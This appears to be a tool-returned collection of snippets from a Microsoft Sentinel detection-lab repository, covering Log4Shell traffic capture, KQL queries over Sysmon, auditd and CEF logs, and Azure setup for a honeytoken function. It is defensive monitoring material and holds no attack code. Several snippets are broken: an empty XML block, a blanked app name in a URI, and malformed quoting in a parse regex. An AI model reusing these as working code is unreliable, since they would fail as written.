--------------------------------
### Capture Network Traffic with tcpdump
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
Use this command on Ubuntu to capture network traffic to a PCAP file, filtering by host IP addresses. This is useful for analyzing network activity during a Log4Shell exploit attempt.
```bash
tcpdump -i eth0 -w log4jShell.pcap host 192.168.2.5 and host 192.168.2.6
```
--------------------------------
### Query Sysmon Logs in Microsoft Sentinel
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
This KQL query filters Syslog messages for 'sysmon' and parses XML to extract EventIDs and EventData, then pivots to display relevant fields.
```kql
Syslog
| where ProcessName == 'sysmon'
| extend EventID = parse_xml(SyslogMessage).Event.System.EventID
| extend EventData = parse_xml(SyslogMessage).Event.EventData.Data
| mv-expand bagexpansion=array EventData
| evaluate bag_unpack(EventData)
| extend Key=tostring(['@Name']), Value=['#text']
| evaluate pivot(
Key, any(Value), TimeGenerated, TenantId, SourceSystem,
EventID, Computer, Facility, SeverityLevel, HostIP, MG, Type, _ResourceId
)
```
--------------------------------
### Query CommonSecurityLog in Microsoft Sentinel
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md
This KQL query can be used in Microsoft Sentinel to search for specific CEF events within the CommonSecurityLog table, filtering by DeviceEventClassID.
```kql
CommonSecurityLog
| where DeviceEventClassID == 'Morto RDP Request Traffic(13274)'
```
--------------------------------
### Check OMS Auditd Service Status
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
Confirm that the AUOMS service is running on an Ubuntu system.
```bash
service auoms status
```
--------------------------------
### Windows Registry XML Query Definition
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
Defines a list of XPath queries for Windows Security Events, targeting registry key deletion, modification, and access events. This XML structure is used by data collection rules.
```xml
```
--------------------------------
### Reset SCX Logging to Intermediate
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-38647-OMI/README.md
Use this command to reset all SCX logging levels back to 'intermediate'. This is typically done after verbose logging is no longer needed.
```bash
/opt/microsoft/scx/bin/tools/scxadmin -log-set all intermediate
```
--------------------------------
### Extract Security Events to PowerShell Hash Table
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
This script iterates through a collection of mappings and filters for 'Security' log channels. It organizes the data into a nested hash table structure based on data source and data component, storing event IDs and names. Use this to prepare event data for XML generation.
```PowerShell
$allMappings = @{}
foreach ($item in $mappings) {
if ($item.log_channel -eq 'Security'){
if (!($allMappings.contains($item.data_source))){
$allMappings.$($item.data_source) = @{}
}
if (!($allMappings[$item.data_source].contains($item.data_component))){
$allMappings[$item.data_source][$item.data_component] = @()
}
if (!($allMappings[$item.data_source][$item.data_component] | Where-Object {$_.EventID -eq "$($item.event_id)"})) {
$eventObject = @{
EventID = "$($item.event_id)"
EventName = "$($item.event_name)"
}
if ($item.filter_in.ToString() -ne 'NaN'){
$eventObject += @{Filters = $item.filter_in}
}
$allMappings[$item.data_source][$item.data_component] += $eventObject
}
}
}
```
--------------------------------
### Query OMS Auditd Execve Events in Microsoft Sentinel
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md
This KQL query defines and calls a function 'execve' to filter Syslog messages for 'AUOMS_EXECVE' events, parsing detailed execution data including process information and command lines.
```kql
let execve=(){
Syslog
| where SyslogMessage has "AUOMS_EXECVE"
| parse SyslogMessage with "type=" EventType " audit(" * "): " EventData
| where EventType =~ "AUOMS_EXECVE"
| project TimeGenerated, EventType, Computer, EventData
| extend EventData = trim_end('containerid=',EventData)
| parse kind=regex EventData with * "success=" success " exit=" * "ppid=" ppid "pid=" pid
"audit_user=" audit_user "auid=" * "user=" user " uid=" uid " group=" * "comm=\"" comm "\"" * "cwd=\"" cwd "" name=\"" name "" (inode|nametype)=" * "(proctitle|cmdline)=" cmdline
| extend cmdline = trim_end('redactors=.*',cmdline)
};
execve
```
--------------------------------
### Define Orchestrator URI
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Custom-Logs-Pipeline/README.md
Sets the URI for the Azure Function orchestrator. Ensure you replace '' with your actual function app name.
```PowerShell
$orchestrator = 'https://.azurewebsites.net/api/orchestrators/Orchestrator'
```
--------------------------------
### Set Current Directory (PowerShell)
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md
Sets the current directory for the PowerShell session to the current location. This is a session-only setting.
```PowerShell
[Environment]::CurrentDirectory=(Get-Location -PSProvider FileSystem).ProviderPath
```
--------------------------------
### Generate Unique Azure Function App Name
Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Deception/README.md
Generates a unique application name for an Azure Function by combining 'honeytoken' with 10 random alphanumeric characters. Ensure the name is lowercase as required by Azure naming conventions.
```PowerShell
$functionAppName = (-join ('honeytoken',-join ((65..90) + (97..122) | Get-Random -Count 10 | % {[char]$_}))).ToLower()
```
=== COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.